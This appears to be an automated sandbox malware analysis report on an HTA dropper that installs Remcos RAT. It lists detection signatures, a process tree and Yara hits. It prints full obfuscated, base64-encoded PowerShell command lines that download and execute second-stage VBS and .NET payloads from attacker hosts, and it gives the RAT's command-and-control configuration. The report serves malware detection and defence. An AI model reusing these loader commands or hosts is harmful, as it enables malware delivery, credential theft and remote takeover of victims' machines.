Windows Analysis Report
seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta
Overview
General Information
Detection
Cobalt Strike, Remcos
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign process
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch or control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 3608 cmdline: mshta.exe "C:\Users\user\Desktop\seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- cmd.exe (PID: 3200 cmdline: "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 1776 cmdline: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))'))) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- csc.exe (PID: 5748 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
- cvtres.exe (PID: 672 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES207F.tmp" "c:\Users\user\AppData\Local\Temp\bxb5o0my\CSC331954E1B244EC883461F7D54BF3FA4.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
- wscript.exe (PID: 612 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
- powershell.exe (PID: 5924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- CasPol.exe (PID: 1776 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | | |
{"Host:Port:Password": ["kiolokgangan.duckdns.org:2430:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-H22KKM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | |
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
Windows_Trojan_Remcos_b296e965 | unknown | unknown | |
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | |
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
Windows_Trojan_Remcos_b296e965 | unknown | unknown | |
REMCOS_RAT_variants | unknown | unknown | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |